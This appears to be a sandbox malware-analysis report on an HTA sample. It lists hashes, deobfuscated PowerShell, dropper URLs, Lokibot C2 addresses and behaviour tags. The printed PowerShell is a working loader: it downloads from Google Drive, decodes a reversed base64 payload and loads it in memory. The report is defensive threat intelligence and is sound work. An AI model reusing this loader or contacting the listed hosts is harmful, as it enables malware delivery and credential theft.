General

  • Target

    nicegirlwithnewthingswhichevennobodknowthatkissingme.hta

  • Size

    130KB

  • Sample

    241024-fx1zeavfre

  • MD5

    401fa9878282b2404925d1ac2599b7c0

  • SHA1

    876d5ea4b89ef48cd614fc098154e3e2caa176f3

  • SHA256

    b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948

  • SHA512

    45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63

  • SSDEEP

    96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T

Malware Config

Extracted

Language: ps1 (deobfuscated)

# powershell snippet 0
invoke-expression "$imageUrl = 'https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.RREPLMS/53/141.671.3.291//:ptth', 'desativado', 'desativado', 'desativado', 'AddInProcess32', 'desativado', 'desativado','desativado','desativado','desativado','desativado','desativado','1','desativado'));"
# powershell snippet 1
$imageurl = "https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur "
$webclient = new-object system.net.webclient
$imagebytes = $webclient.downloaddata("https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur ")
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
$startflag = "<<BASE64_START>>"
$endflag = "<<BASE64_END>>"
$startindex = $imagetext.indexof("<<BASE64_START>>")
$endindex = $imagetext.indexof("<<BASE64_END>>")
$startindex -ge 0 -and $endindex -gt $startindex
$startindex = $startflag.length
$base64length = $endindex - $startindex
$base64command = $imagetext.substring($startindex, $base64length)
$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]
$commandbytes = [system.convert]::frombase64string($base64reversed)
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
$vaimethod = ([dnlib.io.home]).getmethod("VAI")

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Targets

    • Target

      nicegirlwithnewthingswhichevennobodknowthatkissingme.hta

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell and hides the display window.

    • Evasion via Device Credential Deployment

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Accesses Microsoft Outlook profiles

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of SetThreadContext
